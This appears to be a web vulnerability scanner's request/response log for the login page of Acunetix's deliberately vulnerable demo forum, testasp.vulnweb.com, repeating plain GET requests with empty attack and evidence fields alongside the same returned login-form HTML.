<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p 